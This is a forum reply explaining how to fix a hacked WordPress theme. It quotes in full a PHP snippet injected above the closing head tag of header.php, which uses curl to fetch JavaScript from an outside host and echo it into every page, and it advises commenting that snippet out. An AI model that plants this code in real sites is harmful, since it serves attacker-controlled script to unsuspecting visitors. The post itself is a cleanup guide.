Forum Replies Created

Viewing 3 replies - 1 through 3 (of 3 total)
  • I’m happy that I am able to help.

    Testing 123. Is this thing on?
    I fixed this same problem over 50 different blogs.
    I post the solution here 3 times already, but I get the feeling it must not be getting posted because I included the code in my post.

    1.) You don’t need to change your theme.
    2.) you need to FTP into your blog
    3.) open the header.php file in your selected theme folder
    4.) comment out the PHP code just above the </head> html element that is trying to import a javascript file using curl
    ……
    Ohhhh, wait, I get it. You guys are not hosting your own WordPress blog.
    If that is the case, then I guess your Sh*t out of luck. Unless you can edit the header.php page from the admin area of your blog.

    In the folder containing your selected template, there is a header.php file. Just above </head> there is the following:

    <?php
    
    if(function_exists('curl_init'))
    
    {
    
     $url = "https://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js"; 
    
     $ch = curl_init();  
    
     $timeout = 5;  
    
     curl_setopt($ch,CURLOPT_URL,$url); 
    
     curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
    
     curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); 
    
     $data = curl_exec($ch);  
    
     curl_close($ch); 
    
     echo "$data";
    
    }
    
    ?>

    That is the source of the:
    SELECT statscurl_id FROM statscurl WHERE statscurl_ip = ”;

    I just commented it out and all was well.

Viewing 3 replies - 1 through 3 (of 3 total)